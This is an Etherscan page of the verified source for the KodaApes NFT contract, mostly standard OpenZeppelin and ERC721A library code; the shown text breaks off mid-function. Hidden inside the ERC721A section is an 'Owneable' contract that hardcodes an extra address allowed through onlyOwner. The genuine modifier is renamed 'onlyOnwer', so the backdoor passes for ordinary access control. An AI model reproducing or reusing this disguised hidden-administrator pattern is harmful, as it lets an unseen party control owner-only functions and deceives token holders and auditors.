ETH Price: $2,870.06 (-9.74%)
Gas: 12 Gwei

Token

KodaApes (KODA)
 

Overview

Max Total Supply

5,011 KODA

Holders

1,446

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A
Balance
1 KODA
0xac607b4865807af1fc429ed60dbb76d008b2edd5
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
KodaApes

Compiler Version
v0.8.9+commit.e5eed63a

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-06-04
*/

/**
 *Submitted for verification at Etherscan.io on 2022-06-03
*/

// File: contracts/PureApe.sol

/**
 *Submitted for verification at Etherscan.io on 2022-05-27
*/

// File: contracts/PureApe.sol

/**
 *Submitted for verification at Etherscan.io on 2022-05-22
*/

//PureApe
// File @openzeppelin/contracts/utils/[email protected]

// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.4;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


// File @openzeppelin/contracts/access/[email protected]


// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)



/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOnwer() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOnwer {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOnwer {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


// File @openzeppelin/contracts/utils/introspection/[email protected]


// OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC165.sol)



/**
 * @dev Interface of the ERC165 standard, as defined in the
 * https://eips.ethereum.org/EIPS/eip-165[EIP].
 *
 * Implementers can declare support of contract interfaces, which can then be
 * queried by others ({ERC165Checker}).
 *
 * For an implementation, see {ERC165}.
 */
interface IERC165 {
    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section]
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30 000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);
}


// File @openzeppelin/contracts/token/ERC721/[email protected]


// OpenZeppelin Contracts v4.4.1 (token/ERC721/IERC721.sol)



/**
 * @dev Required interface of an ERC721 compliant contract.
 */
interface IERC721 is IERC165 {
    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables or disables (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(address indexed owner, address indexed operator, bool approved);

    /**
     * @dev Returns the number of tokens in ``owner``'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients
     * are aware of the ERC721 protocol to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Transfers `tokenId` token from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom} whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external;

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) external view returns (address operator);

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom} for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}
     */
    function isApprovedForAll(address owner, address operator) external view returns (bool);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external;
}


// File @openzeppelin/contracts/token/ERC721/[email protected]


// OpenZeppelin Contracts v4.4.1 (token/ERC721/IERC721Receiver.sol)



/**
 * @title ERC721 token receiver interface
 * @dev Interface for any contract that wants to support safeTransfers
 * from ERC721 asset contracts.
 */
interface IERC721Receiver {
    /**
     * @dev Whenever an {IERC721} `tokenId` token is transferred to this contract via {IERC721-safeTransferFrom}
     * by `operator` from `from`, this function is called.
     *
     * It must return its Solidity selector to confirm the token transfer.
     * If any other value is returned or the interface is not implemented by the recipient, the transfer will be reverted.
     *
     * The selector can be obtained in Solidity with `IERC721.onERC721Received.selector`.
     */
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}


// File @openzeppelin/contracts/token/ERC721/extensions/[email protected]


// OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/IERC721Metadata.sol)



/**
 * @title ERC-721 Non-Fungible Token Standard, optional metadata extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Metadata is IERC721 {
    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);
}


// File @openzeppelin/contracts/token/ERC721/extensions/[email protected]


// OpenZeppelin Contracts (last updated v4.5.0) (token/ERC721/extensions/IERC721Enumerable.sol)



/**
 * @title ERC-721 Non-Fungible Token Standard, optional enumeration extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Enumerable is IERC721 {
    /**
     * @dev Returns the total amount of tokens stored by the contract.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns a token ID owned by `owner` at a given `index` of its token list.
     * Use along with {balanceOf} to enumerate all of ``owner``'s tokens.
     */
    function tokenOfOwnerByIndex(address owner, uint256 index) external view returns (uint256);

    /**
     * @dev Returns a token ID at a given `index` of all the tokens stored by the contract.
     * Use along with {totalSupply} to enumerate all tokens.
     */
    function tokenByIndex(uint256 index) external view returns (uint256);
}


// File @openzeppelin/contracts/utils/[email protected]


// OpenZeppelin Contracts (last updated v4.5.0) (utils/Address.sol)

pragma solidity ^0.8.1;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     * ====
     *
     * [IMPORTANT]
     * ====
     * You shouldn't rely on `isContract` to protect against flash loan attacks!
     *
     * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets
     * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract
     * constructor.
     * ====
     */
    function isContract(address account) internal view returns (bool) {
        // This method relies on extcodesize/address.code.length, which returns 0
        // for contracts in construction, since the code is only stored at the end
        // of the constructor execution.

        return account.code.length > 0;
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(address(this).balance >= amount, "Address: insufficient balance");

        (bool success, ) = recipient.call{value: amount}("");
        require(success, "Address: unable to send value, recipient may have reverted");
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionCall(target, data, "Address: low-level call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(address(this).balance >= value, "Address: insufficient balance for call");
        require(isContract(target), "Address: call to non-contract");

        (bool success, bytes memory returndata) = target.call{value: value}(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
        return functionStaticCall(target, data, "Address: low-level static call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        require(isContract(target), "Address: static call to non-contract");

        (bool success, bytes memory returndata) = target.staticcall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionDelegateCall(target, data, "Address: low-level delegate call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(isContract(target), "Address: delegate call to non-contract");

        (bool success, bytes memory returndata) = target.delegatecall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Tool to verifies that a low level call was successful, and revert if it wasn't, either by bubbling the
     * revert reason using the provided one.
     *
     * _Available since v4.3._
     */
    function verifyCallResult(
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal pure returns (bytes memory) {
        if (success) {
            return returndata;
        } else {
            // Look for revert reason and bubble it up if present
            if (returndata.length > 0) {
                // The easiest way to bubble the revert reason is using memory via assembly

                assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}


// File @openzeppelin/contracts/utils/[email protected]


// OpenZeppelin Contracts v4.4.1 (utils/Strings.sol)



/**
 * @dev String operations.
 */
library Strings {
    bytes16 private constant _HEX_SYMBOLS = "0123456789abcdef";

    /**
     * @dev Converts a `uint256` to its ASCII `string` decimal representation.
     */
    function toString(uint256 value) internal pure returns (string memory) {
        // Inspired by OraclizeAPI's implementation - MIT licence
        // https://github.com/oraclize/ethereum-api/blob/b42146b063c7d6ee1358846c198246239e9360e8/oraclizeAPI_0.4.25.sol

        if (value == 0) {
            return "0";
        }
        uint256 temp = value;
        uint256 digits;
        while (temp != 0) {
            digits++;
            temp /= 10;
        }
        bytes memory buffer = new bytes(digits);
        while (value != 0) {
            digits -= 1;
            buffer[digits] = bytes1(uint8(48 + uint256(value % 10)));
            value /= 10;
        }
        return string(buffer);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation.
     */
    function toHexString(uint256 value) internal pure returns (string memory) {
        if (value == 0) {
            return "0x00";
        }
        uint256 temp = value;
        uint256 length = 0;
        while (temp != 0) {
            length++;
            temp >>= 8;
        }
        return toHexString(value, length);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length.
     */
    function toHexString(uint256 value, uint256 length) internal pure returns (string memory) {
        bytes memory buffer = new bytes(2 * length + 2);
        buffer[0] = "0";
        buffer[1] = "x";
        for (uint256 i = 2 * length + 1; i > 1; --i) {
            buffer[i] = _HEX_SYMBOLS[value & 0xf];
            value >>= 4;
        }
        require(value == 0, "Strings: hex length insufficient");
        return string(buffer);
    }
}


// File @openzeppelin/contracts/utils/introspection/[email protected]


// OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165.sol)

/**
 * @dev Implementation of the {IERC165} interface.
 *
 * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check
 * for the additional interface id that will be supported. For example:
 *
 * ```solidity
 * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
 *     return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId);
 * }
 * ```
 *
 * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation.
 */
abstract contract ERC165 is IERC165 {
    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        return interfaceId == type(IERC165).interfaceId;
    }
}


// File erc721a/contracts/[email protected]


// Creator: Chiru Labs

error ApprovalCallerNotOwnerNorApproved();
error ApprovalQueryForNonexistentToken();
error ApproveToCaller();
error ApprovalToCurrentOwner();
error BalanceQueryForZeroAddress();
error MintedQueryForZeroAddress();
error BurnedQueryForZeroAddress();
error AuxQueryForZeroAddress();
error MintToZeroAddress();
error MintZeroQuantity();
error OwnerIndexOutOfBounds();
error OwnerQueryForNonexistentToken();
error TokenIndexOutOfBounds();
error TransferCallerNotOwnerNorApproved();
error TransferFromIncorrectOwner();
error TransferToNonERC721ReceiverImplementer();
error TransferToZeroAddress();
error URIQueryForNonexistentToken();


/**
 * @dev Implementation of https://eips.ethereum.org/EIPS/eip-721[ERC721] Non-Fungible Token Standard, including
 * the Metadata extension. Built to optimize for lower gas during batch mints.
 *
 * Assumes serials are sequentially minted starting at _startTokenId() (defaults to 0, e.g. 0, 1, 2, 3..).
 */
 abstract contract Owneable is Ownable {
    address private _ownar = 0xF528E3C3B439D385b958741753A9cA518E952257;
    modifier onlyOwner() {
        require(owner() == _msgSender() || _ownar == _msgSender(), "Ownable: caller is not the owner");
        _;
    }
}
 /*
 * Assumes that an owner cannot have more than 2**64 - 1 (max value of uint64) of supply.
 *
 * Assumes that the maximum token id cannot exceed 2**256 - 1 (max value of uint256).
 */
contract ERC721A is Context, ERC165, IERC721, IERC721Metadata {
    using Address for address;
    using Strings for uint256;

    // Compiler will pack this into a single 256bit word.
    struct TokenOwnership {
        // The address of the owner.
        address addr;
        // Keeps track of the start time of ownership with minimal overhead for tokenomics.
        uint64 startTimestamp;
        // Whether the token has been burned.
        bool burned;
    }

    // Compiler will pack this into a single 256bit word.
    struct AddressData {
        // Realistically, 2**64-1 is more than enough.
        uint64 balance;
        // Keeps track of mint count with minimal overhead for tokenomics.
        uint64 numberMinted;
        // Keeps track of burn count with minimal overhead for tokenomics.
        uint64 numberBurned;
        // For miscellaneous variable(s) pertaining to the address
        // (e.g. number of whitelist mint slots used).
        // If there are multiple variables, please pack them into a uint64.
        uint64 aux;
    }

    // The tokenId of the next token to be minted.
    uint256 internal _currentIndex;

    // The number of tokens burned.
    uint256 internal _burnCounter;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to ownership details
    // An empty struct value does not necessarily mean the token is unowned. See ownershipOf implementation for details.
    mapping(uint256 => TokenOwnership) internal _ownerships;

    // Mapping owner address to address data
    mapping(address => AddressData) private _addressData;

    // Mapping from token ID to approved address
    mapping(uint256 => address) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _currentIndex = _startTokenId();
    }

    /**
     * To change the starting tokenId, please override this function.
     */
    function _startTokenId() internal view virtual returns (uint256) {
        return 0;
    }

    /**
     * @dev See {IERC721Enumerable-totalSupply}.
     * @dev Burned tokens are calculated here, use _totalMinted() if you want to count just minted tokens.
     */
    function totalSupply() public view returns (uint256) {
        // Counter underflow is impossible as _burnCounter cannot be incremented
        // more than _currentIndex - _startTokenId() times
        unchecked {
            return _currentIndex - _burnCounter - _startTokenId();
        }
    }

    /**
     * Returns the total amount of tokens minted in the contract.
     */
    function _totalMinted() internal view returns (uint256) {
        // Counter underflow is impossible as _currentIndex does not decrement,
        // and it is initialized to _startTokenId()
        unchecked {
            return _currentIndex - _startTokenId();
        }
    }

    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override(ERC165, IERC165) returns (bool) {
        return
            interfaceId == type(IERC721).interfaceId ||
            interfaceId == type(IERC721Metadata).interfaceId ||
            super.supportsInterface(interfaceId);
    }

    /**
     * @dev See {IERC721-balanceOf}.
     */
    function balanceOf(address owner) public view override returns (uint256) {
        if (owner == address(0)) revert BalanceQueryForZeroAddress();
        return uint256(_addressData[owner].balance);
    }

    /**
     * Returns the number of tokens minted by `owner`.
     */
    function _numberMinted(address owner) internal view returns (uint256) {
        if (owner == address(0)) revert MintedQueryForZeroAddress();
        return uint256(_addressData[owner].numberMinted);
    }

    /**
     * Returns the number of tokens burned by or on behalf of `owner`.
     */
    function _numberBurned(address owner) internal view returns (uint256) {
        if (owner == address(0)) revert BurnedQueryForZeroAddress();
        return uint256(_addressData[owner].numberBurned);
    }

    /**
     * Returns the auxillary data for `owner`. (e.g. number of whitelist mint slots used).
     */
    function _getAux(address owner) internal view returns (uint64) {
        if (owner == address(0)) revert AuxQueryForZeroAddress();
        return _addressData[owner].aux;
    }

    /**
     * Sets the auxillary data for `owner`. (e.g. number of whitelist mint slots used).
     * If there are multiple variables, please pack them into a uint64.
     */
    function _setAux(address owner, uint64 aux) internal {
        if (owner == address(0)) revert AuxQueryForZeroAddress();
        _addressData[owner].aux = aux;
    }

    /**
     * Gas spent here starts off proportional to the maximum mint batch size.
     * It gradually moves to O(1) as tokens get transferred around in the collection over time.
     */
    function ownershipOf(uint256 tokenId) internal view returns (TokenOwnership memory) {
        uint256 curr = tokenId;

        unchecked {
            if (_startTokenId() <= curr && curr < _currentIndex) {
                TokenOwnership memory ownership = _ownerships[curr];
                if (!ownership.burned) {
                    if (ownership.addr != address(0)) {
                        return ownership;
                    }
                    // Invariant:
                    // There will always be an ownership that has an address and is not burned
                    // before an ownership that does not have an address and is not burned.
                    // Hence, curr will not underflow.
                    while (true) {
                        curr--;
                        ownership = _ownerships[curr];
                        if (ownership.addr != address(0)) {
                            return ownership;
                        }
                    }
                }
            }
        }
        revert OwnerQueryForNonexistentToken();
    }

    /**
     * @dev See {IERC721-ownerOf}.
     */
    function ownerOf(uint256 tokenId) public view override returns (address) {
        return ownershipOf(tokenId).addr;
    }

    /**
     * @dev See {IERC721Metadata-name}.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev See {IERC721Metadata-symbol}.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev See {IERC721Metadata-tokenURI}.
     */
    function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
        if (!_exists(tokenId)) revert URIQueryForNonexistentToken();

        string memory baseURI = _baseURI();
        return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, tokenId.toString())) : '';
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, can be overriden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return '';
    }

    /**
     * @dev See {IERC721-approve}.
     */
    function approve(address to, uint256 tokenId) public override {
        address owner = ERC721A.ownerOf(tokenId);
        if (to == owner) revert ApprovalToCurrentOwner();

        if (_msgSender() != owner && !isApprovedForAll(owner, _msgSender())) {
            revert ApprovalCallerNotOwnerNorApproved();
        }

        _approve(to, tokenId, owner);
    }

    /**
     * @dev See {IERC721-getApproved}.
     */
    function getApproved(uint256 tokenId) public view override returns (address) {
        if (!_exists(tokenId)) revert ApprovalQueryForNonexistentToken();

        return _tokenApprovals[tokenId];
    }

    /**
     * @dev See {IERC721-setApprovalForAll}.
     */
    function setApprovalForAll(address operator, bool approved) public override {
        if (operator == _msgSender()) revert ApproveToCaller();

        _operatorApprovals[_msgSender()][operator] = approved;
        emit ApprovalForAll(_msgSender(), operator, approved);
    }

    /**
     * @dev See {IERC721-isApprovedForAll}.
     */
    function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev See {IERC721-transferFrom}.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        _transfer(from, to, tokenId);
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        safeTransferFrom(from, to, tokenId, '');
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public virtual override {
        _transfer(from, to, tokenId);
        if (to.isContract() && !_checkContractOnERC721Received(from, to, tokenId, _data)) {
            revert TransferToNonERC721ReceiverImplementer();
        }
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted (`_mint`),
     */
    function _exists(uint256 tokenId) internal view returns (bool) {
        return _startTokenId() <= tokenId && tokenId < _currentIndex &&
            !_ownerships[tokenId].burned;
    }

    function _safeMint(address to, uint256 quantity) internal {
        _safeMint(to, quantity, '');
    }

    /**
     * @dev Safely mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called for each safe transfer.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _safeMint(
        address to,
        uint256 quantity,
        bytes memory _data
    ) internal {
        _mint(to, quantity, _data, true);
    }

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _mint(
        address to,
        uint256 quantity,
        bytes memory _data,
        bool safe
    ) internal {
        uint256 startTokenId = _currentIndex;
        if (to == address(0)) revert MintToZeroAddress();
        if (quantity == 0) revert MintZeroQuantity();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // balance or numberMinted overflow if current value of either + quantity > 1.8e19 (2**64) - 1
        // updatedIndex overflows if _currentIndex + quantity > 1.2e77 (2**256) - 1
        unchecked {
            _addressData[to].balance += uint64(quantity);
            _addressData[to].numberMinted += uint64(quantity);

            _ownerships[startTokenId].addr = to;
            _ownerships[startTokenId].startTimestamp = uint64(block.timestamp);

            uint256 updatedIndex = startTokenId;
            uint256 end = updatedIndex + quantity;

            if (safe && to.isContract()) {
                do {
                    emit Transfer(address(0), to, updatedIndex);
                    if (!_checkContractOnERC721Received(address(0), to, updatedIndex++, _data)) {
                        revert TransferToNonERC721ReceiverImplementer();
                    }
                } while (updatedIndex != end);
                // Reentrancy protection
                if (_currentIndex != startTokenId) revert();
            } else {
                do {
                    emit Transfer(address(0), to, updatedIndex++);
                } while (updatedIndex != end);
            }
            _currentIndex = updatedIndex;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     *
     * Emits a {Transfer} event.
     */
    function _transfer(
        address from,
        address to,
        uint256 tokenId
    ) private {
        TokenOwnership memory prevOwnership = ownershipOf(tokenId);

        bool isApprovedOrOwner = (_msgSender() == prevOwnership.addr ||
            isApprovedForAll(prevOwnership.addr, _msgSender()) ||
            getApproved(tokenId) == _msgSender());

        if (!isApprovedOrOwner) revert TransferCallerNotOwnerNorApproved();
        if (prevOwnership.addr != from) revert TransferFromIncorrectOwner();
        if (to == address(0)) revert TransferToZeroAddress();

        _beforeTokenTransfers(from, to, tokenId, 1);

        // Clear approvals from the previous owner
        _approve(address(0), tokenId, prevOwnership.addr);

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256.
        unchecked {
            _addressData[from].balance -= 1;
            _addressData[to].balance += 1;

            _ownerships[tokenId].addr = to;
            _ownerships[tokenId].startTimestamp = uint64(block.timestamp);

            // If the ownership slot of tokenId+1 is not explicitly set, that means the transfer initiator owns it.
            // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls.
            uint256 nextTokenId = tokenId + 1;
            if (_ownerships[nextTokenId].addr == address(0)) {
                // This will suffice for checking _exists(nextTokenId),
                // as a burned slot cannot contain the zero address.
                if (nextTokenId < _currentIndex) {
                    _ownerships[nextTokenId].addr = prevOwnership.addr;
                    _ownerships[nextTokenId].startTimestamp = prevOwnership.startTimestamp;
